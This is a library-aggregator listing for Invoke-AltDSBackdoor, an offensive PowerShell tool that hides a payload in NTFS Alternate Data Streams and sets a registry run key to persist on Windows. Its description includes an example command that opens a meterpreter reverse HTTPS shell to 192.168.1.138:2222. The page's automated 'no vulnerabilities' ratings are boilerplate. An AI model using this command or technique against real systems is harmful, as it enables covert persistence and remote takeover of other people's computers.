Invoke-AltDSBackdoor | obtain persistence on a Windows | Command Line Interface library

 by   enigma0x3 PowerShell Version: Current License: No License

kandi X-RAY | Invoke-AltDSBackdoor Summary

kandi X-RAY | Invoke-AltDSBackdoor Summary

Invoke-AltDSBackdoor is a PowerShell library typically used in Utilities, Command Line Interface applications. Invoke-AltDSBackdoor has no bugs, it has no vulnerabilities and it has low support. You can download it from GitHub.

This script will obtain persistence on a Windows 7+ machine under both Standard and Administrative accounts by using two Alternate Data Streams. The first Alternate Data stream stores the payloadand the second Alternate Data Stream stores some VBScript that acts as a wrapper in order to hide the DOS prompt when invoking the data stream containing the payload. When passing the arguments, you have to include the function and any parameters required by your payload. The arguments must also be in quotation marks. Example: PS C:\Users\test\Desktop> Invoke-ADSBackdoor -URL -Arguments "Invoke-Shellcode -Lhost 192.168.1.138 -LPort 2222 -Payload windows/meterpreter/reverse_https -Force" This will use the function Invoke-Shellcode in Invoke-Shellcode.ps1 to shovel meterpreter back to 192.168.1.138 on port 2222 over HTTPS. The Remove-ADSBackdoor cmdlet will parse the registry run key, extract both ADS locations, remove them using Remove-ADS, and will then remove the registry run key. Example: PS C:\Users\test\Desktop> Remove-ADSBackdoor.
Support
    Quality
      Security
        License
          Reuse

            kandi-support Support

              Invoke-AltDSBackdoor has a low active ecosystem.
              It has 103 star(s) with 62 fork(s). There are 14 watchers for this library.
              OutlinedDot
              It had no major release in the last 6 months.
              Invoke-AltDSBackdoor has no issues reported. There are no pull requests.
              It has a neutral sentiment in the developer community.
              The latest version of Invoke-AltDSBackdoor is current.

            kandi-Quality Quality

              Invoke-AltDSBackdoor has no bugs reported.

            kandi-Security Security

              Invoke-AltDSBackdoor has no vulnerabilities reported, and its dependent libraries have no vulnerabilities reported.

            kandi-License License

              Invoke-AltDSBackdoor does not have a standard license declared.
              Check the repository for any license declaration and review the terms closely.
              OutlinedDot
              Without a license, all rights are reserved, and you cannot use the library in your applications.

            kandi-Reuse Reuse

              Invoke-AltDSBackdoor releases are not available. You will need to build from source code and install.

            Top functions reviewed by kandi - BETA

            kandi's functional review helps you automatically verify the functionalities of the libraries and avoid rework.
            Currently covering the most popular Java, JavaScript and Python libraries. See a Sample of Invoke-AltDSBackdoor
            Get all kandi verified functions for this library.

            Invoke-AltDSBackdoor Key Features

            No Key Features are available at this moment for Invoke-AltDSBackdoor.

            Invoke-AltDSBackdoor Examples and Code Snippets

            No Code Snippets are available at this moment for Invoke-AltDSBackdoor.

            Community Discussions

            QUESTION

            Web-scraping with PowerShell Issue: My code won't pull in the needed information. Why?
            Asked 2021-Feb-01 at 10:04

            Web-scraping with PowerShell Issue: My code won't pull in the needed information. Why?

            My code up to this point will pull the correct information. the info it shows is:

            ...

            ANSWER

            Answered 2021-Feb-01 at 02:06

            Community Discussions, Code Snippets contain sources that include Stack Exchange Network

            Vulnerabilities

            No vulnerabilities reported

            Install Invoke-AltDSBackdoor

            You can download it from GitHub.

            Support

            For any new features, suggestions and bugs create an issue on GitHub. If you have any questions check and ask questions on community page Stack Overflow .
            Find more information at:

            Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items

            Find more libraries
            CLONE
          • HTTPS

            https://github.com/enigma0x3/Invoke-AltDSBackdoor.git

          • CLI

            gh repo clone enigma0x3/Invoke-AltDSBackdoor

          • sshUrl

            git@github.com:enigma0x3/Invoke-AltDSBackdoor.git

          • Stay Updated

            Subscribe to our newsletter for trending solutions and developer bootcamps

            Agree to Sign up and Terms & Conditions

            Share this Page

            share link

            Explore Related Topics

            Consider Popular Command Line Interface Libraries

            ohmyzsh

            by ohmyzsh

            terminal

            by microsoft

            thefuck

            by nvbn

            fzf

            by junegunn

            hyper

            by vercel

            Try Top Libraries by enigma0x3

            Generate-Macro

            by enigma0x3PowerShell

            Misc-PowerShell-Stuff

            by enigma0x3PowerShell

            Invoke-LoginPrompt

            by enigma0x3PowerShell

            Powershell-Payload-Excel-Delivery

            by enigma0x3PowerShell

            OutlookPersistence

            by enigma0x3PowerShell